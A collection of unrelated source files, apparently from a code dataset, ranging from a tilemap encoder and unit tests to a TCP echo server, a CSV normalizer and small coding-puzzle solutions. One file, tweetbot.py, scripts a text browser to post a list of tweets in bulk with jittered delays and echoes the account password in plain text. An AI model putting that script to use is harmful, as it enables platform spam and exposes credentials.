{"seq_id":"141567946","text":"#!/usr/bin/env python\n# -*- coding: windows-1252 -*-\n\n# author: diego.hahn\n#\n\n# EXTREMELY HARDCODED :D \n\nimport os\nimport struct\nimport sys\nimport array\n\ndef vertical(buffer):\n c = ''\n for y in range(8)[::-1]:\n c += buffer[4*y:4*(y+1)]\n return c\n\ndef horizontal(buffer):\n c = ''\n for y in range(8):\n reverse = buffer[4*y:4*(y+1)][::-1]\n for w in range(4):\n c += chr((ord(reverse[w]) << 4 | ord(reverse[w]) >> 4) & 0xFF)\n return c\n \ndef diagonal(buffer):\n return horizontal(vertical(buffer))\n\ndef create_tilesdict( buff , codec ):\n tilesdict = {}\n if codec == 4:\n length = len(buff) / 32\n for x in range(length):\n tilesdict.update({x:buff[32*x:32*(x+1)]})\n else:\n length = len(buff) / 64\n for x in range(length):\n tilesdict.update({x:buff[64*x:64*(x+1)]})\n return tilesdict\n\ndef reduce_tilesdict( tilesdict ):\n offset = 0 \n reduced_tilesdict = dict()\n for x in tilesdict: \n if reduced_tilesdict.has_key(tilesdict[x]):\n continue\n elif reduced_tilesdict.has_key(horizontal(tilesdict[x])):\n continue\n elif reduced_tilesdict.has_key(vertical(tilesdict[x])):\n continue\n elif reduced_tilesdict.has_key(diagonal(tilesdict[x])):\n continue \n else:\n reduced_tilesdict.update({tilesdict[x]:offset})\n offset += 1 \n # invert the dictionary\n ret = dict()\n for k,v in reduced_tilesdict.items():\n ret.update({v:k})\n \n return ret \n\ndef EncodeImage( src, dst, map, full, entry, codec ):\n # Build the tileset from the full image (a concatenation of all the images)\n with open( full, \"rb\" ) as fd : \n tilesdict = create_tilesdict( fd.read() , codec )\n # Reduce the tile dictionary to unique tiles only\n reduced_td = reduce_tilesdict(tilesdict)\n \n # Build the tileset\n tileset = array.array(\"c\")\n out = open( dst, \"wb\" )\n for i in range(len(reduced_td)):\n tileset.extend(reduced_td[i])\n out.write(reduced_td[i]) \n out.close()\n \n with open( src, \"rb\" ) as fd:\n tilesdict = create_tilesdict( fd.read() , codec )\n \n # Build the tilemap - the palette information comes from the original tilemap\n tilemap = list()\n val = reduced_td.values()\n for i in 
range(len(tilesdict)):\n if tilesdict[i] in val:\n tilemap.append( 0x0000 | val.index(tilesdict[i]))\n elif horizontal(tilesdict[i]) in val:\n tilemap.append( 0x0400 | val.index(horizontal(tilesdict[i])))\n elif vertical(tilesdict[i]) in val:\n tilemap.append( 0x0800 | val.index(vertical(tilesdict[i])))\n elif diagonal(tilesdict[i]) in val:\n tilemap.append( 0x0C00 | val.index(diagonal(tilesdict[i]))) \n else:\n raise Exception(\"tile %d not found in the reduced tileset\" % i)\n\n size = 0x20*0x20\n # Update the tilemap\n with open(map, \"r+b\") as fd: \n palette = []\n for i in range(size):\n palette.append(struct.unpack(\"<H\", fd.read(2))[0] & 0xF000)\n\n fd.seek(0)\n for i in range(size):\n fd.write(struct.pack(\"<H\", palette[i] | tilemap[i]))\n\ndef DecodeImage( src, dst, map, entry, codec ):\n\n # Read the tileset\n with open( src, \"rb\" ) as fd:\n tilesdict = create_tilesdict( fd.read() , codec )\n \n with open(map, \"rb\") as fd:\n\n size = 0x20*0x20\n out = open( dst, \"wb\" )\n for _ in range( size ):\n key = struct.unpack( \"<H\" , fd.read(2))[0] \n \n # TODO - Images with multiple palettes\n key &= 0xFFF\n \n if (key & 0xC00) == 0xC00 :\n out.write(diagonal(tilesdict[(key & 0x3FF)]))\n elif (key & 0x800) == 0x800:\n out.write(vertical(tilesdict[(key & 0x3FF)]))\n elif (key & 0x400) == 0x400:\n out.write(horizontal(tilesdict[(key & 0x3FF)]))\n else:\n out.write(tilesdict[(key & 0x3FF)]) \n \n out.close()\n\nif __name__ == \"__main__\":\n \n import argparse\n \n os.chdir( sys.path[0] )\n #os.system( 'cls' )\n\n parser = argparse.ArgumentParser()\n parser.add_argument( '-m', dest = \"mode\", type = str, required = True )\n parser.add_argument( '-s', dest = \"src\", type = str, nargs = \"?\", required = True )\n parser.add_argument( '-d', dest = \"dst\", type = str, nargs = \"?\", required = True )\n parser.add_argument( '-t', dest = \"map\", type = str, nargs = \"?\", required = True )\n parser.add_argument( '-f', dest = \"full\", type = str, nargs = \"?\" )\n parser.add_argument( '-e', dest = \"entry\", type = int, required = True )\n parser.add_argument( '-c', dest = \"codec\", type = int, required = True )\n \n args = parser.parse_args() \n\n if args.mode == \"u\":\n DecodeImage( args.src , args.dst , args.map , args.entry , args.codec )\n elif args.mode == \"p\":\n EncodeImage( args.src , args.dst , args.map, args.full , args.entry , args.codec )\n ","sub_path":"asm/tool_lmlevel/tool_tilemap.py","file_name":"tool_tilemap.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"513375722","text":"import os\nimport time\nfrom random import *\nos.system(\"chmod +x greet\")\nos.system(\"bash greet\")\nwhile True:\n\tprint(\"\\nEnter Your username/Phone :\")\n\tuser=input().strip()\n\tprint(\"\\nEnter Your Password :\")\n\tpas=input().strip()\n\tprint(\"\\nEnter Tweet List File Path\")\n\tpath=input().strip()\n\tprint(\"\\nEnter Additional Things to Put Like #SpeedX or @SpeedX\")\n\tadd=input().strip()\n\tprint(\"\\nEnter Delay Between Tweets (in milliseconds) (1000 ms = 1 s)\")\n\tdelay=int(input())\n\tprint(\"Your Twitter Username : \\\"\"+user+\"\\\"\")\n\tprint(\"\\nYour Twitter Password : \\\"\"+pas+\"\\\"\")\n\tprint(\"\\nFile Containing Tweets : \\\"\"+path+\"\\\"\")\n\tprint(\"\\nAdd Text : \\\"\"+add+\"\\\" To Each Tweet\")\n\tprint(\"\\nDelay Between 2 Tweets : \\\"\"+str(delay)+\"\\\"\")\n\tprint(\"\\nPress Y To Continue...\\nPress N To Edit...\")\n\tch=input().strip()\n\tif (ch.find('y') != -1 or ch.find('Y') 
!= -1):\n\t\tbreak\nprint(\"\\n\\n\\nLogging in...\")\nf=open(\"init\",\"w\")\ns1=\"# Command logfile created by Lynx 2.8.9rel.1 SpeedX\\n# Arg0 = lynx\\n# Arg1 = http://mobile.twitter.com/session/new\\n# Arg2 = -cmd_log=init\"\ns1=s1+\"\\nkey Down Arrow\\nkey Down Arrow\"\ns2=\"\"\ns3=\"\"\nfor s in user:\n\ts2=s2+\"\\nkey \"+s\nfor s in pas:\n\ts3=s3+\"\\nkey \"\n\tif s == ' ':\n\t\ts3=s3+\"<space>\"\n\telse:\n\t\ts3=s3+s\ns3=s3+\"\\nkey Down Arrow\\nkey Right Arrow\"\nf.write(s1)\nf.write(s2)\nf.write(\"\\nkey Down Arrow\")\nf.write(s3)\nf.write(\"\\nkey q\\nkey y\")\nf.close()\nos.system(\"lynx http://mobile.twitter.com/session/new -cmd_script=init\")\nprint(\"\\nLogged in Successfully!!\")\nprint(\"\\nLoading Tweet List...\")\nf=open(path,\"r\")\nt=f.read()\nf.close()\ntl=t.split(\"\\n\")\nprint(str(len(tl))+\" Tweets Loaded !!!\")\nprint(\"Starting To Tweet !!!\")\nn=0\nfirst=\"\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Right Arrow\\nkey Down Arrow\\nkey Down Arrow\"\nlast=\"\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Down Arrow\\nkey Right Arrow\\nkey q\\nkey y\"\nfor tweet in tl:\n\tif tweet.strip() == \"\":\n\t\tcontinue\n\tn=n+1\n\ttweet=add+\" \"+tweet\n\tf1=open(\"tweetspeedx\"+str(n),\"w\")\n\tf1.write(\"key Right Arrow\")\n\tf1.write(first)\n\tfor st in tweet:\n\t\tf1.write(\"\\nkey \")\n\t\tif st == ' ':\n\t\t\tf1.write(\"<space>\")\n\t\telse:\n\t\t\tf1.write(st)\n\tf1.write(last)\n\tf1.close()\n\tos.system(\"lynx -cfg=./lynx.cfg http://mobile.twitter.com -cmd_script=tweetspeedx\"+str(n))\n\tprint(\"Tweet Number: \"+str(n))\n\tprint(\"Tweeted: \"+tweet)\n\tos.system(\"rm tweetspeedx\"+str(n))\n\ttdel=randint(0,delay//2)\n\top=randint(0,100)\n\tif op%2==0:\n\t\ttdel=delay-tdel\n\telse:\n\t\ttdel=delay+tdel\n\tprint(\"Pausing For \"+str(tdel/1000.0)+\" Seconds!!!\")\n\ttime.sleep(tdel/1000.0)\nprint(str(n)+\" Tweets Tweeted!!\")\nprint(\"Task Completed !!!\")\nprint(\"I am very Tired...\\nPress Enter To Logout!!\")\ninput()\nf=open(\"logout\",\"w\")\nf.write(\"# Command logfile created by Lynx 2.8.9rel.1 SpeedX\\n# Arg0 = lynx\\n# Arg1 = http://mobile.twitter.com/logout\\n# Arg2 = -cmd_log=logout\")\nf.write(\"\\nkey Right Arrow\\nkey Right Arrow\\nkey q\\nkey y\")\nf.close()\nos.system(\"lynx http://mobile.twitter.com/logout -cmd_script=logout\")\nos.system(\"bash greet\")\nexit()\n","sub_path":"TweetBot-master/tweetbot.py","file_name":"tweetbot.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"147858028","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport gc\n\nfrom neutron_lib import context\nfrom sqlalchemy.ext import declarative\nimport testtools\n\nfrom neutron.db import standard_attr\nfrom neutron.tests import base\nfrom neutron.tests.unit import testlib_api\n\n\nclass StandardAttrTestCase(base.BaseTestCase):\n def setUp(self):\n super(StandardAttrTestCase, self).setUp()\n 
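# tests declare model classes on throwaway declarative bases; collect them so they do not linger between tests\n 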
self.addCleanup(gc.collect)\n\n def _make_decl_base(self):\n # construct a new base so we don't interfere with the main\n # base used in the sql test fixtures\n return declarative.declarative_base(\n cls=standard_attr.model_base.NeutronBaseV2)\n\n def test_standard_attr_resource_model_map(self):\n rs_map = standard_attr.get_standard_attr_resource_model_map()\n base = self._make_decl_base()\n\n class MyModel(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n api_collections = ['my_resource', 'my_resource2']\n api_sub_resources = ['my_subresource']\n\n rs_map = standard_attr.get_standard_attr_resource_model_map()\n self.assertEqual(MyModel, rs_map['my_resource'])\n self.assertEqual(MyModel, rs_map['my_resource2'])\n self.assertEqual(MyModel, rs_map['my_subresource'])\n\n sub_rs_map = standard_attr.get_standard_attr_resource_model_map(\n include_resources=False,\n include_sub_resources=True)\n self.assertNotIn('my_resource', sub_rs_map)\n self.assertNotIn('my_resource2', sub_rs_map)\n self.assertEqual(MyModel, sub_rs_map['my_subresource'])\n\n nosub_rs_map = standard_attr.get_standard_attr_resource_model_map(\n include_resources=True,\n include_sub_resources=False)\n self.assertEqual(MyModel, nosub_rs_map['my_resource'])\n self.assertEqual(MyModel, nosub_rs_map['my_resource2'])\n self.assertNotIn('my_subresource', nosub_rs_map)\n\n class Dup(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n api_collections = ['my_resource']\n\n with testtools.ExpectedException(RuntimeError):\n standard_attr.get_standard_attr_resource_model_map()\n\n def test_standard_attr_resource_parent_map(self):\n base = self._make_decl_base()\n\n class TagSupportModel(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n collection_resource_map = {'collection_name': 'member_name'}\n tag_support = True\n\n class TagUnsupportModel(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n collection_resource_map = {'collection_name2': 'member_name2'}\n tag_support = False\n\n class TagUnsupportModel2(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n collection_resource_map = {'collection_name3': 'member_name3'}\n\n parent_map = standard_attr.get_tag_resource_parent_map()\n self.assertEqual('member_name', parent_map['collection_name'])\n self.assertNotIn('collection_name2', parent_map)\n self.assertNotIn('collection_name3', parent_map)\n\n class DupTagSupportModel(standard_attr.HasStandardAttributes,\n standard_attr.model_base.HasId,\n base):\n collection_resource_map = {'collection_name': 'member_name'}\n tag_support = True\n\n with testtools.ExpectedException(RuntimeError):\n standard_attr.get_tag_resource_parent_map()\n\n\nclass StandardAttrAPIImpactTestCase(testlib_api.SqlTestCase):\n \"\"\"Test case to determine if a resource has had new fields exposed.\"\"\"\n\n def test_api_collections_are_expected(self):\n # NOTE to reviewers. 
If this test is being modified, it means the\n # resources being extended by standard attr extensions have changed.\n # Ensure that the patch has made this discoverable to API users.\n # This means a new extension for a new resource or a new extension\n # indicating that an existing resource now has standard attributes.\n # Ensure devref list of resources is updated at\n # doc/source/devref/api_extensions.rst\n expected = ['subnets', 'trunks', 'routers', 'segments',\n 'security_group_rules', 'networks', 'policies',\n 'subnetpools', 'ports', 'security_groups', 'floatingips',\n 'logs']\n self.assertEqual(\n set(expected),\n set(standard_attr.get_standard_attr_resource_model_map().keys())\n )\n\n def test_api_tag_support_is_expected(self):\n # NOTE: If this test is being modified, it means the resources for tag\n # support are extended. It changes tag support API. The API change\n # should be exposed in release note for API users. And also it should\n # be list as other tag support resources in doc/source/devref/tag.rst\n expected = ['subnets', 'trunks', 'routers', 'networks', 'policies',\n 'subnetpools', 'ports', 'security_groups', 'floatingips']\n self.assertEqual(\n set(expected),\n set(standard_attr.get_tag_resource_parent_map().keys())\n )\n\n\nclass StandardAttrRevisesBulkDeleteTestCase(testlib_api.SqlTestCase):\n\n def test_bulk_delete_protection(self):\n # security group rules increment security groups so they must not be\n # allowed to be deleted in bulk\n mm = standard_attr.get_standard_attr_resource_model_map()\n sg_rule_model = mm['security_group_rules']\n with testtools.ExpectedException(RuntimeError):\n ctx = context.get_admin_context()\n ctx.session.query(sg_rule_model).delete()\n","sub_path":"neutron/tests/unit/db/test_standard_attr.py","file_name":"test_standard_attr.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"237533918","text":"# -*- coding: utf-8 -*-\n\"\"\"Performance Testing\"\"\"\nfrom animio.test.lib import *\nfrom animio.lib import *\n\nimport mrv.maya.nt as nt\n\nimport maya.OpenMayaAnim as apianim \n\nimport time\nimport sys\n\nclass TestPerformance( unittest.TestCase ):\n\t\n\t@with_scene('21kcurves.mb')\n\tdef test_anim_handle(self):\n\t\t# manage all anim nt\n\t\tah = AnimationHandle.create()\n\t\tahapi = ah.object()\n\t\t\n\t\tst = time.time()\n\t\tis_not_ah = lambda n: n != ahapi\n\t\tsellist = nt.toSelectionList(nt.it.iterDgNodes(asNode=False, predicate=is_not_ah))\n\t\tah.set_animation(sellist)\n\t\telapsed = time.time() - st\n\t\tprint >>sys.stderr, \"Managed animation of roughly 21k nodes in %f s\" % elapsed\n\t\t\n\t\t\n\t\t# apply animation, worst case ( as it is already connected )\n\t\tst = time.time()\n\t\tah.apply_animation()\n\t\telapsed = time.time() - st\n\t\tprint >>sys.stderr, \"Re-Applied animation onto same existing animation of roughly 21k nodes in %f s\" % elapsed\n\t\t\n\t\t# clear animation\n\t\tst = time.time()\n\t\tpa = nt.api.MPlugArray()\n\t\tapianim.MAnimUtil.findAnimatedPlugs(sellist, pa)\n\t\t\n\t\t# do it the fast way - its easier to use mrv, but much faster to do it \n\t\t# directly\n\t\tmod = nt.api.MDGModifier( )\n\t\tfor anim_plug in pa:\n\t\t\tmod.disconnect(anim_plug.minput(), anim_plug )\n\t\t# END for each anim curve to disconnect\n\t\tmod.doIt()\n\t\telapsed = time.time() - st\n\t\tprint >>sys.stderr, \"Cleared animation on %i plugs in %f s\" % (len(pa), elapsed)\n\t\t\n\t\tassert len(nt.AnimCurve.findAnimation(sellist)) 
== 0\n\t\t\n\t\t# apply animation, best case as it is not yet connected\n\t\tst = time.time()\n\t\tah.apply_animation()\n\t\telapsed = time.time() - st\n\t\tprint >>sys.stderr, \"Applied animation of roughly 21k nodes in %f s\" % elapsed\n\t\t\n\t\t\n\t\t\n","sub_path":"animio/test/performance/test_performance.py","file_name":"test_performance.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"347123112","text":"#!/usr/bin/python3\n\"\"\"\nusing my storage with flask\n\"\"\"\nfrom models import storage\nfrom flask import Flask, render_template\napp = Flask(__name__)\n\n\n@app.route('/states_list', strict_slashes=False)\ndef states_list():\n lista = [storage.all('State')[x] for x in storage.all('State')]\n return render_template('7-states_list.html', lista=lista)\n\n\n@app.teardown_appcontext\ndef close_(exception):\n storage.close()\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='5000')\n","sub_path":"web_flask/7-states_list.py","file_name":"7-states_list.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"177928714","text":"class Solution:\n\n def convert(self, s: str, numRows: int) -> str:\n if numRows == 1:\n return s\n arr = []\n for i in range(numRows):\n row = []\n for j in range(len(s)):\n row.append('')\n arr.append(row)\n i = 0\n j = 0\n direction = ''\n for k in range(len(s)):\n arr[i][j] = s[k]\n if i == 0:\n direction = 'down'\n elif i == numRows - 1:\n direction = 'up'\n\n if direction == 'up':\n i = i-1\n j = j+1\n elif direction == 'down':\n i = i+1\n ret = []\n for i in range(numRows):\n ret.append(''.join(arr[i]))\n return ''.join(ret)\n\n\n\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.convert('AB', 1))\n","sub_path":"problem6.py","file_name":"problem6.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"429022240","text":"# Aim: Open a site \"n\" number of times after a defined delay\n\n# Dependencies\nimport webbrowser\nimport time\n\n# Define the web address to be accessed\nweb_address = \"http://www.google.com\"\n\n# run a loop \"n\" times Eg. 
n = 3\nn = 3\n# Define a sleep-time variable (in seconds)\nsleep_time = 2\n# Keep track of n's iteration through count\ncount = 0\n# Loop for the task\nwhile count < n:\n # Sleep for defined time\n time.sleep(sleep_time)\n # Open the website\n webbrowser.open(web_address)\n # Increment count\n count = count + 1\n# End Of Code","sub_path":"Project-1/Python-Tutorial/break_time.py","file_name":"break_time.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"275481280","text":"#-*- coding:utf-8 -*-\nimport socket\nimport threading\n\nbind_ip = '127.0.0.1'\nbind_port = 9999\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# socket.AF_INET selects IPv4, socket.SOCK_STREAM selects TCP.\n\nserver.bind((bind_ip, bind_port))\n#Sets our own IP address and port.\n#To set the remote peer's IP address and port, you would use connect instead.\n\nserver.listen(5)\n#Sets the maximum number of queued connections.\nprint('[*] Listening on %s:%d' % (bind_ip, bind_port))\n\ndef handle_client(client_socket):\n bufsize = 1024\n while True:\n request = client_socket.recv(bufsize)\n client_socket.send(request)\n if request == b'exit':\n break\n client_socket.close()\n\nwhile True:\n client, addr = server.accept()\n #Returns a new socket and the address of the client connected to the bound socket.\n print('[*] Accepted connection from : %s:%d' %(addr[0], addr[1]))\n\n client_handler = threading.Thread(target=handle_client, args=(client,))\n #Creates a thread using threading.\n #Use multiprocessing instead if you want to take advantage of multiple cores.\n #target specifies the callable to invoke and args specifies its arguments.\n\n client_handler.start()\n #Starts the thread.","sub_path":"python_Source/untitled2/chapter11_chat/TcpServer_1on1.py","file_name":"TcpServer_1on1.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"170602647","text":"#!/usr/bin/env python\n#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-\n\nfrom bes.key_value.key_value_list import key_value_list\n\nfrom rebuild.recipe.value.masked_value import masked_value\nfrom rebuild.recipe.value.masked_value_list import masked_value_list\nfrom rebuild.recipe.value.value_key_values import value_key_values\n\nfrom .ingest_method_descriptor_http import ingest_method_descriptor_http\nfrom .ingest_method_descriptor_git import ingest_method_descriptor_git\n\nfrom .ingest_method import ingest_method\n\nclass ingest_unit_test(object):\n\n @classmethod\n def make_ingest_method(clazz, method, url = None, checksum = None, ingested_filename = None):\n method = method or 'http'\n url = url or 'http://www.examples.com/foo.zip'\n checksum = checksum or 'chk'\n ingested_filename = ingested_filename or 'foo.zop'\n values = masked_value_list([\n masked_value('all', value_key_values(value = key_value_list.parse('url={}'.format(url)))),\n masked_value('all', value_key_values(value = key_value_list.parse('checksum={}'.format(checksum)))),\n masked_value('all', value_key_values(value = key_value_list.parse('ingested_filename={}'.format(ingested_filename)))),\n ])\n\n if method == 'git':\n desc = ingest_method_descriptor_git()\n elif method == 'http':\n desc = ingest_method_descriptor_http()\n else:\n raise RuntimeError('invalid method: {} - should be one of: git http'.format(method))\n \n return ingest_method(desc, 
values)\n","sub_path":"lib/rebuild/ingest/ingest_unit_test.py","file_name":"ingest_unit_test.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"360723640","text":"import sys\nimport csv\nfrom datetime import datetime, timedelta\n\n## takes HH:MM:SS.MS format string and returns total number of seconds\ndef convertToSeconds(time_string):\n\thours, minutes, seconds_and_milli = time_string.split(':')\n\tseconds, milliseconds = seconds_and_milli.split('.')\n\t## float(timedelta(hours=int(hours), minutes=int(minutes), seconds=int(seconds), milliseconds=int(milliseconds)).total_seconds())\n\ttotal = float(hours) * 3600 + float(minutes) * 60 + float(seconds) + float(milliseconds) / 1000\n\treturn total\n\ndef main():\n\t## read csv from stdin into a list of decoded lines\n\tout_rows = []\n\tbuffer = sys.stdin.buffer\n\tlines = []\n\tfor line in buffer:\n\t\tline = line.strip()\n\t\tcontent = line.decode('utf-8', 'replace')\n\t\tlines.append(content)\n\t# data = sys.stdin.read().splitlines()\n\t# csv_reader = csv.DictReader(data)\n\tcsv_reader = csv.DictReader(lines)\n\tfor row in csv_reader:\n\n\t\ttry: \n\t\t\t## convert pacific to eastern time, and write to output as ISO-8601\n\t\t\ttimestamp = row['Timestamp']\n\t\t\tpacific_datetime = datetime.strptime(timestamp, '%m/%d/%y %I:%M:%S %p') \n\t\t\teastern_datetime = pacific_datetime + timedelta(hours=3)\n\n\t\t\tout_eastern_isoformat = eastern_datetime.isoformat()\n\n\t\t\t## format zip code as 5 digits, if less than 5 digits, prepend zeroes until a width of 5 is achieved\n\t\t\tzipcode = row['ZIP']\n\t\t\tout_padded_zipcode = zipcode.zfill(5)\n\n\t\t\t## Fullname should be converted to uppercase \n\t\t\tout_fullname = row['FullName'].upper()\n\n\t\t\t## Address is passed through as is\n\t\t\tout_address = row[\"Address\"]\n\n\t\t\t## Foo Duration and Bar Duration are in HH:MM:SS.MS format\n\t\t\t## convert both to total number of seconds in floating point format without rounding\n\t\t\tfoo_duration = row['FooDuration']\n\t\t\tbar_duration = row['BarDuration']\n\n\t\t\tout_foo_total_seconds = convertToSeconds(foo_duration)\n\t\t\tout_bar_total_seconds = convertToSeconds(bar_duration)\n\n\t\t\t## instead of reading the value from TotalDuration, \n\t\t\t## replace with the sum of foo total seconds and bar total seconds \n\t\t\tout_total_duration = out_foo_total_seconds + out_bar_total_seconds\n\n\t\t\t## Notes\n\t\t\tout_notes = row[\"Notes\"]\n\n\t\t\tout_row = [\n\t\t\t\t\tout_eastern_isoformat, \n\t\t\t\t\tout_address, \n\t\t\t\t\tout_padded_zipcode, \n\t\t\t\t\tout_fullname, \n\t\t\t\t\tstr(out_foo_total_seconds), \n\t\t\t\t\tstr(out_bar_total_seconds), \n\t\t\t\t\tstr(out_total_duration), \n\t\t\t\t\tout_notes]\n\n\t\t\tout_rows.append(out_row)\n\n\t\t## if invalid unicode causes an error within any of the datetime parsing/float math\n\t\t## skip row\n\t\texcept Exception as e:\n\t\t\tsys.stderr.write(\"Error caused by invalid character, skipping row\\n\")\n\t\t\tcontinue\n\n\n\tcsv_writer = csv.writer(sys.stdout, delimiter=',')\n\n\t## write fieldnames \n\tfieldnames = csv_reader.fieldnames\n\tcsv_writer.writerow(fieldnames)\n\n\t## write each list to stdout as one row\n\tfor out_row in out_rows:\n\t\tcsv_writer.writerow(out_row)\n\n\nif __name__ == 
'__main__':\n\tmain()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"normalizer.py","file_name":"normalizer.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"193516560","text":"import pandas as pd\r\nimport numpy as np\r\nfrom pathlib import Path\r\nimport sqlite3\r\nfrom sqlite3 import Connection\r\nimport streamlit as st\r\n\r\nURI_SQLITE_DB = \"test.db\"\r\n\r\ndef init_db(conn: Connection):\r\n\tconn.execute(\r\n\t\t\"\"\"CREATE TABLE IF NOT EXISTS test\r\n\t\t\t(\r\n\t\t\t\tINPUT1 INT,\r\n\t\t\t\tINPUT2 INT\r\n\t\t\t);\"\"\"\r\n\t)\r\n\tconn.commit()\r\n\r\n\r\ndef display_data(conn: Connection):\r\n\tif st.checkbox(\"Display data in sqlite database\"):\r\n\t\tst.dataframe(get_data(conn))\r\n\r\n\r\ndef get_data(conn: Connection):\r\n\tdf = pd.read_sql(\"SELECT * FROM test\", con=conn)\r\n\treturn df\r\n\r\n\r\n@st.cache(hash_funcs={Connection: id})\r\ndef get_connection(path: str):\r\n\t\"\"\"Put the connection in cache to reuse if path does not change between Streamlit reruns.\r\n\tNB : https://stackoverflow.com/questions/48218065/programmingerror-sqlite-objects-created-in-a-thread-can-only-be-used-in-that-sa\r\n\t\"\"\"\r\n\treturn sqlite3.connect(path, check_same_thread=False)\r\n\r\n\r\n############### to export dataframe in excel with button #############\r\nimport base64\r\nfrom io import BytesIO\r\n#pip install xlsxwriter\r\ndef to_excel(df):\r\n\toutput = BytesIO()\r\n\twriter = pd.ExcelWriter(output, engine='xlsxwriter')\r\n\tdf.to_excel(writer, index=True, sheet_name='Sheet1') # <--- here\r\n\twriter.save()\r\n\tprocessed_data = output.getvalue()\r\n\treturn processed_data\r\n\r\ndef get_table_download_link(df):\r\n\t\"\"\"Generates a link allowing the data in a given panda dataframe to be downloaded\r\n\tin: dataframe\r\n\tout: href string\r\n\t\"\"\"\r\n\tval = to_excel(df)\r\n\tb64 = base64.b64encode(val) # val looks like b'...'\r\n\treturn f'<a href=\"data:application/octet-stream;base64,{b64.decode()}\" download=\"extract.xlsx\">Download xlsx file</a>' # decode b'abc' => abc\r\n# df = ... 
# your dataframe\r\n# st.markdown(get_table_download_link(df), unsafe_allow_html=True)\r\n\r\ndef main():\r\n\t#### First part DB ##########\r\n\tdef build_sidebar(conn: Connection):\r\n\t\tif st.button(\"Save to list\"):\r\n\t\t\tconn.execute(f\"INSERT INTO test (INPUT1, INPUT2) VALUES ({input1}, {input2})\")\r\n\t\t\tconn.commit()\r\n\tconn = get_connection(URI_SQLITE_DB)\r\n\tinit_db(conn)\r\n\t#############################\r\n\r\n\tinput1 = 1\r\n\tinput2 = 2\r\n\r\n\r\n\t################## Export to Excel SQLite\r\n\tbuild_sidebar(conn)\r\n\tdisplay_data(conn)\r\n\tdf = get_data(conn)\r\n\t#df = pd.DataFrame(np.random.randint(0,100,size=(100, 4)), columns=list('ABCD'))\r\n\tdownload = st.button(\"export to excel\")\r\n\tif download:\r\n\t\tdf\r\n\t\tst.markdown(get_table_download_link(df), unsafe_allow_html=True)\r\n\t\r\nif __name__ == \"__main__\":\r\n\tmain()","sub_path":"sqlite_export_xls.py","file_name":"sqlite_export_xls.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
{"seq_id":"600000660","text":"from typing import List\n\n\nclass Solution:\n # def plusOne(self, digits: List[int]) -> List[int]:\n # # adding 1 in the beginning is the same as adding a carryover\n # # while carryover > 0 && index in bounds\n # # store sum % 10 to current index, decrement index\n # # after loop, if carryover > 0, prepend 1 to digits\n # carry = 1\n # i = len(digits) - 1\n # while carry > 0 and i >= 0:\n # digits[i] += carry\n # if digits[i] >= 10:\n # carry = 1\n # digits[i] %= 10\n # else:\n # carry = 0\n # i -=1\n #\n # if carry > 0:\n # digits.insert(0, 1)\n #\n # return digits\n\n # def plusOne(self, digits: List[int]) -> List[int]:\n # rev = list(reversed(digits))\n # carry = 1\n # i = 0\n # while carry > 0:\n # if i < len(rev):\n # rev[i] += 1\n # if rev[i] == 10:\n # carry = 1\n # rev[i] = 0\n # else:\n # carry = 0\n # else:\n # if carry > 0:\n # rev.append(carry)\n # carry = 0\n #\n # i += 1\n #\n # return list(reversed(rev))\n\n def plusOne(self, digits: List[int]) -> List[int]:\n carry = 1\n i = len(digits) - 1\n while carry > 0:\n if i >= 0:\n digits[i] += carry\n if digits[i] == 10:\n carry = 1\n digits[i] = 0\n else:\n carry = 0\n else:\n if carry > 0:\n digits.insert(0, carry)\n carry = 0\n i -= 1\n return digits\n\nif __name__ == '__main__':\n digits = [1,2,3]\n # [1,2,4]\n\n # digits = [4,3,2,1]\n # [4,3,2,2]\n\n # digits = [9]\n # [1,0]\n\n result = Solution().plusOne(digits)\n 